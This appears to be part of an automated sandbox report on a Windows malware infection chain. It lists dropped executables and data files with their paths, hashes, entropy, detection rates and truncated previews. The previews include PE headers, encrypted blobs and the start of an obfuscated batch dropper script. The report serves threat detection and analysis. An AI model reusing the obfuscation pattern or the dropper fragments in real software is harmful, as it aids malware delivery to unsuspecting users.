                                                                                                                                                                          MD5:26D8D52BAC8F4615861F39E118EFA28D
                                                                                                                                                                          SHA1:EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
                                                                                                                                                                          SHA-256:8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
                                                                                                                                                                          SHA-512:1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....*z.,..{....,..{....o......(....*....0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3024384
                                                                                                                                                                          Entropy (8bit):6.520311944109943
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:7h+1X0gVt9n8RLfp9ePqvSKkFf7AILEL:9+1X08t9na2iZeLEL
                                                                                                                                                                          MD5:6250E716BE9BB3618C85DA75BB8A8351
                                                                                                                                                                          SHA1:60533E737BDDEF80D4E94C103109EE8677639196
                                                                                                                                                                          SHA-256:2E392125F3B243B95CBE940912E0483DB711C2820937FB684862F519FEF9FB69
                                                                                                                                                                          SHA-512:A13A28E597A460509F06A3EC1BD425BC277E9F8BDAAA009EEB063D2398CFCD9ECA1A2A3A7963B47F8BEB516460E40E4D0A5A41FE6BC6A278B145AE22BA97C408
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........01...........@..........................`1...........@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...wrsfsivy.p+......p+.................@...bfxftgti..... 1.....................@....taggant.0...01.."..................@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):660480
                                                                                                                                                                          Entropy (8bit):7.64329230449762
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:UuM8OZLrEIC6jejDTN2kNhqqitQ+jHKVkdvXPg9O/1ACWFtIC5NcDU:dI4I50fsYqqitSkxPg41Xgtp5WDU
                                                                                                                                                                          MD5:BDF3C509A0751D1697BA1B1B294FD579
                                                                                                                                                                          SHA1:3A3457E5A8B41ED6F42B3197CFF53C8EC50B4DB2
                                                                                                                                                                          SHA-256:D3948AE31C42FCBA5D9199E758D145FF74DAD978C80179AFB3148604C254BE6D
                                                                                                                                                                          SHA-512:AA81CCBAE9F622531003F1737D22872AE909B28359DFB94813A39D74BDE757141D7543681793102A1DC3DCAECEA27CFFD0363DE8BBB48434FCF8B6DAFEF320B3
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...q. g..........................................@.......................................@.....................................(............................0... ..........................`u......x...................P............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg..............................@..@.tls......... ......................@....reloc... ...0..."..................@..B.call........`..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):334848
                                                                                                                                                                          Entropy (8bit):6.761223756666625
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:+tWC7xvtddofKKrybbuMY88Jc/oZ3ipoOvYcOCL7E6tt7thlp4:+RZtddofKKrzHPJ3ii0bL7E6t7Z2
                                                                                                                                                                          MD5:FBA8F56206955304B2A6207D9F5E8032
                                                                                                                                                                          SHA1:F84CBCC3E34F4D2C8FEA97C2562F937E1E20FE28
                                                                                                                                                                          SHA-256:11227EAD147B4154C7BD21B75D7F130B498C9AD9B520CA1814C5D6A688C89B1B
                                                                                                                                                                          SHA-512:56E3A0823A7ABE08E1C9918D8FA32C574208B462B423AB6BDE03345C654B75785FDC3180580C0D55280644B3A9574983E925F2125C2D340CF5E96B98237E99FA
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................D........................@.......................................@.................................R....................................K...................................................................................text....B.......D.................. ..`.rdata..'%...`...&...H..............@..@.data............b...n..............@....reloc...K.......L..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):36
                                                                                                                                                                          Entropy (8bit):3.8537006129630296
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:hGQRALjVLeJKuWJu:hCVLWqu
                                                                                                                                                                          MD5:A1CA4BEBCD03FAFBE2B06A46A694E29A
                                                                                                                                                                          SHA1:FFC88125007C23FF6711147A12F9BBA9C3D197ED
                                                                                                                                                                          SHA-256:C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
                                                                                                                                                                          SHA-512:6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:This content is no longer available.
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):665088
                                                                                                                                                                          Entropy (8bit):7.641303787368916
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:3KbQTjM37Fhgr4ZNkE1Er41iaNhqqitQ+jHKVkdvXPg9O/1ACWFtIK5NcDU:nTY37wr4ZyprDGqqitSkxPg41XgtF5Wo
                                                                                                                                                                          MD5:E3D038EE8743EEB4759105852F8C9973
                                                                                                                                                                          SHA1:C029F68A065ECBAF124F2D8569FC3D097CFF8DA9
                                                                                                                                                                          SHA-256:250784E06AC98AD9183950EF5EC3549C2A5E2FFB0306F167AE84C4CB55B12922
                                                                                                                                                                          SHA-512:F45BA1D08582AD5DAF8B09FAA52807169542B29054204DA2E346F9DBD84D93041452503EC87617979B326A3D9E00EFE18FE7CC6BAA377C6E99327161BB886445
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....n"g............................B.............@.......................................@.....................................(............................@..l ..........................`.......x...............\...L............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg....... ......................@..@.tls.........0......................@....reloc..l ...@..."..................@..B.bss.........p..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2137600
                                                                                                                                                                          Entropy (8bit):7.961389881797388
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:uGVhpyQho3PpnAE1ktGuQXdOS98NNT/tspRkYlQ3Yr2We5Vz+:hHouyWGuQNOS98NLCMYcD+
                                                                                                                                                                          MD5:212E008D0B8A1D4874846987F37E34FA
                                                                                                                                                                          SHA1:0C125B1139DBBB0AA2FEDFB916D1365001CCE1E9
                                                                                                                                                                          SHA-256:D9D47FD94A18E02CB473EC8ED22D7D7F6CE79825F999D129D662F71409A48082
                                                                                                                                                                          SHA-512:F2D886EF7CEDC828234029B48BB146C449ECDF7D2D293C759AF6DC61F873FE873BE5CBEA21B9C07FD6ED868AA8B32CBA804B79BD788475F53490B54872E7D0D6
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,.......r...........@...........................r......B!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... ..).........................@...cbbjugzk......X.....................@...lfmofsyx.....pr......x .............@....taggant.0....r.."...| .............@...........................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2874880
                                                                                                                                                                          Entropy (8bit):6.557349853737172
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:KB88yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy4:KBrWV0C6DVlt8HeUjoT7gH
                                                                                                                                                                          MD5:DA2EA6B51A3216E065B2CED231C9E57F
                                                                                                                                                                          SHA1:EE7EA72BD395654CB1126D9445A130B9BCBC21F0
                                                                                                                                                                          SHA-256:55A539C066DCCA8B451445A6BC712FED79B4984297E86E629FBB74E50256FA8E
                                                                                                                                                                          SHA-512:7C72F9DCF959DE9F012DD06841F6E3DEFA892A5F3AB5ED20A667D4FAC0C613B8E5CE34699590D720FD7A38FB7F62FFC7DC77AA027713FAD558EB84F371A49ABB
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J........................@.......................... /.......+...@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...wjqxmzgq.0)......$).................@...xobrrexd..............+.............@....taggant.0......."....+.............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):893608
                                                                                                                                                                          Entropy (8bit):6.62028134425878
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):594650
                                                                                                                                                                          Entropy (8bit):7.9996649139256055
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:12288:38tfmUx7zSsIfrhCw5PeXvQXFSSdHDBu4ceeEl2a/uJ2:38hxasKfPeXv4AgHFu4c4l9/Z
                                                                                                                                                                          MD5:4B0812FABC1BA34D8D45D28180F6C75F
                                                                                                                                                                          SHA1:B9D99C00A6F9D5F23E244CC0555F82A7D0EEB950
                                                                                                                                                                          SHA-256:73312C3EA63FAF89E2067E034A9148BF73EFB5140C1BA6A67AAF62170EE98103
                                                                                                                                                                          SHA-512:7F72FFD39F7B66EA701EC642A427C90F9C3EE9BE69A3E431C492BE76AE9A73E8B2B1FBB16553A5A6D8722BAF30B2A392A47C7C998D618459BF398D47D218D158
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z*."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR*..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..|.....;.e.|.g.0.^i..f.._e:...0/.....'.[......*...A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....*-....
                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1913856
                                                                                                                                                                          Entropy (8bit):7.948339549086525
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:GbEsevvEMsoxrwgtiN+hyt13k5XheTvhDXX4lzvscT01IOBTqRglaWF/SwJMYGjS:f1xZiN+hSk5Xh48lzTI1lqKlfi3E
                                                                                                                                                                          MD5:08FA512ABC42A3D5F8BA6AD72F5C550E
                                                                                                                                                                          SHA1:6B38E59BC4DFDEBE5396700E918B96FC22A07611
                                                                                                                                                                          SHA-256:D573C7E78C05A4D3A653269E00635A56516FEFA23A8485A29FDECF75EF5B5E18
                                                                                                                                                                          SHA-512:EE1CEC539286E2B3C8DBE792F288004E0C02FDBAFDB149DA9CE7C5A76105F0AF256DF25BFFD9070179E23CF665804F9B52FFE10C1C598C21FD4050B957A1490D
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................K......H....@.................................W...k...........................PpK..............................pK..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...mahfbdtk. ...`1.....................@...akwexcdv......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2778624
                                                                                                                                                                          Entropy (8bit):6.510150934407278
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:RIEdKjoDJjVnbnxKiZJp+6BuVhEEi+Vt+c:SEdKjkJjVnbbprBg2EZt+
                                                                                                                                                                          MD5:481C8B24C57DA4A1A61F3BA321F84C5C
                                                                                                                                                                          SHA1:57B83E709DDF9067F94E3831F6CC2E18F59C42EE
                                                                                                                                                                          SHA-256:F3DAF351DC8D9B8EC19991E83AD7344D18124790592E971CF3D93070C0800C33
                                                                                                                                                                          SHA-512:3E5018BE21D277141C1FFD1716D43E9F809BD9E260612CD0DAE27F62C0973F37A3154905D6E532353808DCDDD15C979CADE9250E016282C09D5F1FB1C7FD1A34
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                          Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............*.. ...`....@.. ....................... +.....kx*...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...cfyesryy. *.......*..:..............@...gwntuilp. ....*......@*.............@....taggant.@....*.."...D*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1911296
                                                                                                                                                                          Entropy (8bit):7.950159316093512
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:HGXEq3S4qDsnbTLPKyNe4dAZj9HmCgB/dhxYR8ks9:HGPmwbTLPhGkBB1Lw8t
                                                                                                                                                                          MD5:19EC3B43009D50CF26E7BF585E169042
                                                                                                                                                                          SHA1:770360550C4365DA0FC098C7A0144F76F8D24BCE
                                                                                                                                                                          SHA-256:FDB64B9F7129172F671495C0F04464DD39BE622B044DC1E316F30A28805079AD
                                                                                                                                                                          SHA-512:1905D6E48880DB9E2395A792B9228211DC907A83261F4BB13ABAC572A26B587DF9E435FB4D9E7C771CBA79BF5061D931245599D9911EBA8A571C949CF8E24ED2
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................K...........@.......................... L...........@.................................W...k.......D.....................K...............................K..................................................... . ............................@....rsrc...D...........................@....idata ............................@... . +.........................@...edfilslq......1.....................@...gprpjvtr......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1251), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25056
                                                                                                                                                                          Entropy (8bit):5.097145047047532
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:zm7k5aS8bpJSQ/QZ8btc/2LgQf4nxr251E8tangG:qk5aKQIWtc/2LgQf4nxrU1HtangG
                                                                                                                                                                          MD5:2A84A77AD125A30E442D57C63C18E00E
                                                                                                                                                                          SHA1:68567EE0D279087A12374C10A8B7981F401B20B8
                                                                                                                                                                          SHA-256:0C6EAD18E99077A5DDE401987A0674B156C07CCF9B7796768DF8E881923E1769
                                                                                                                                                                          SHA-512:9D6A720F970F8D24ED4C74BED25C5E21C90191930B0CC7E310C8DD45F6ED7A0B3D9B3ABBD8F0B4979F992C90630D215B1852B3242C5D0A6E7A42ECEF03C0076A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Set Cassette=i..xoayWebcam-Hosting-Mel-Yearly-Supposed-Mean-Higher-Necklace-..pxCriterion-Step-Gives-..dPNudist-Institutes-Prompt-Similarly-Ebook-Smoke-Deer-..ClrcHours-Lone-Rubber-Controller-Judges-Permits-Party-..PWCharming-Refer-Accused-..HdBarely-Gay-Outputs-Kelly-Fed-Documentcreatetextnode-Nylon-..oGSubstances-Guidance-Calculated-Saved-Proteins-Stats-Prince-Balloon-..CIInvestigations-Sip-..vICConsider-Assumes-Departure-Jam-Ya-Alloy-Assault-Ur-..Set Lawrence=M..XKuIx-Entitled-Bored-Preserve-Sandwich-..yLMBankruptcy-Render-..GySAnswered-Anaheim-Sword-Driver-Uniprotkb-..RGConstraint-Polo-Jeep-Jpeg-..SLPut-Territory-Point-States-Production-Mag-R-..FlHorizontal-Vote-Villages-Msgid-Lebanon-Bon-Tours-..jpBpAssisted-Furnished-Cubic-..Set Alexander=e..HcgMazda-Eds-Mime-Remark-Description-Und-Mesh-Independently-Tall-..ZtInstructors-Ibm-Str-Drug-..SfVacancies-Qld-Goat-Did-..enRp-Food-Feature-Occupations-..zhJXLaunch-Retained-Gilbert-Administered-Member-..OqStockings-Indeed-Dot-Liver-Maximize
                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1251), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25056
                                                                                                                                                                          Entropy (8bit):5.097145047047532
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:zm7k5aS8bpJSQ/QZ8btc/2LgQf4nxr251E8tangG:qk5aKQIWtc/2LgQf4nxrU1HtangG
                                                                                                                                                                          MD5:2A84A77AD125A30E442D57C63C18E00E
                                                                                                                                                                          SHA1:68567EE0D279087A12374C10A8B7981F401B20B8
                                                                                                                                                                          SHA-256:0C6EAD18E99077A5DDE401987A0674B156C07CCF9B7796768DF8E881923E1769
                                                                                                                                                                          SHA-512:9D6A720F970F8D24ED4C74BED25C5E21C90191930B0CC7E310C8DD45F6ED7A0B3D9B3ABBD8F0B4979F992C90630D215B1852B3242C5D0A6E7A42ECEF03C0076A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Set Cassette=i..xoayWebcam-Hosting-Mel-Yearly-Supposed-Mean-Higher-Necklace-..pxCriterion-Step-Gives-..dPNudist-Institutes-Prompt-Similarly-Ebook-Smoke-Deer-..ClrcHours-Lone-Rubber-Controller-Judges-Permits-Party-..PWCharming-Refer-Accused-..HdBarely-Gay-Outputs-Kelly-Fed-Documentcreatetextnode-Nylon-..oGSubstances-Guidance-Calculated-Saved-Proteins-Stats-Prince-Balloon-..CIInvestigations-Sip-..vICConsider-Assumes-Departure-Jam-Ya-Alloy-Assault-Ur-..Set Lawrence=M..XKuIx-Entitled-Bored-Preserve-Sandwich-..yLMBankruptcy-Render-..GySAnswered-Anaheim-Sword-Driver-Uniprotkb-..RGConstraint-Polo-Jeep-Jpeg-..SLPut-Territory-Point-States-Production-Mag-R-..FlHorizontal-Vote-Villages-Msgid-Lebanon-Bon-Tours-..jpBpAssisted-Furnished-Cubic-..Set Alexander=e..HcgMazda-Eds-Mime-Remark-Description-Und-Mesh-Independently-Tall-..ZtInstructors-Ibm-Str-Drug-..SfVacancies-Qld-Goat-Did-..enRp-Food-Feature-Occupations-..zhJXLaunch-Retained-Gilbert-Administered-Member-..OqStockings-Indeed-Dot-Liver-Maximize
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):64218
                                                                                                                                                                          Entropy (8bit):7.996758881771081
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1536:PKwBxCcWt2UqNKZSb5H/U36q/tUJKLT+aYkIR:jYt2/OV/w4RYDR
                                                                                                                                                                          MD5:46A51002CDBE912D860CE08C83C0376B
                                                                                                                                                                          SHA1:6D0AE63850BD8D5C86E45CBA938609A7F051F59B
                                                                                                                                                                          SHA-256:18070C4700DF6609E096F2E79F353844E3E98C9AACCA69919A8BAEB9F9890017
                                                                                                                                                                          SHA-512:ED7C8D09E305687DC687AB23F6A83692232677C120836C8F4B876C4DFA867B47E29684E7E1C7973F6C29EEED1B8530B96F609A6111DDE36D94F6657C9B5A4E44
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:$S.v]U.H......;...g.-...4e.xC.W+<7.....FhK.CM..&qCp.....As.L.....>Q....Z..~>k.0..>.....Kh\KD.z%.J....H`S...]8=.CKN........Q..7..1..j*...,.Wz.,.............j..<b..d..5a."`.$l......Y..C!>EM.&-.....\...,[$.......HMS..=.=0VBC.?.p......kWp;....-.Ye;...n.A$..2x.I.z....W.....9.Gg..}.....#.J.{.......~.H5.7-.m....p...<...{wJ[_.....W.....&....G....T.:..3q....A...E....e.....w.H..-...i.+..F....Y.FK|A.9..\..........b....)..?e...6Z...J8.X.rU;..d...V0.v..|].?[.K1`..{.}q...G..9.....M.........]...v.(.`>&?.l<........|....V..b\&.s...?.$.a..H.g....v..5..../../J...Z>'J.X5A5.e........$..e.n.v.........#.0Om..r....E.'.zDw.@......,...-....P.....@wA&..5.5...@...d....j?.K..\[,..T.Y...x....7d.gc..^.....:..&r.....q&.x.dh7...d...`W.W.....#p4I.N..,.UK5..y4..k...hS.....gH...1..k....6..X.).#......IT.Y.aN...@...A.K.........H...A.....3^...e..Z.D.x...c..z\.u.8. /_.7?...*......O...D.d./@-BEe..G.T......<.ld...CX..zC.ljM$..H.9...#_u..~Z...h.f?.J...-?.....v.0.5 ....l}..=c...*.
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):70656
                                                                                                                                                                          Entropy (8bit):7.997474648514076
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1536:OJpwtrTK0Sj35K4+x5Lclh8+c3CXpKUlNzHoaSJIRg77ah30fkD:6+JT7yiYX8z3CZXPHo9KVWkD
                                                                                                                                                                          MD5:8CA4BBB4E4DDF045FF547CB2D438615C
                                                                                                                                                                          SHA1:3E2FC0FDC0359A08C7782F44A5CCEBF3A52B5152
                                                                                                                                                                          SHA-256:4E4BB4AA1F996E96DB8E18E4F2A6576673C00B76126F846BA821B4CD3998AFED
                                                                                                                                                                          SHA-512:B45ED05FA6D846C0A38CEFCD5D256FDEE997B9010BC249A34D830953100CA779AB88547353CC8BADAF2908F59FF3A8C780F7CAC189C0F549246FEB504ECB5AF9
                                                                                                                                                                          Malicious:false
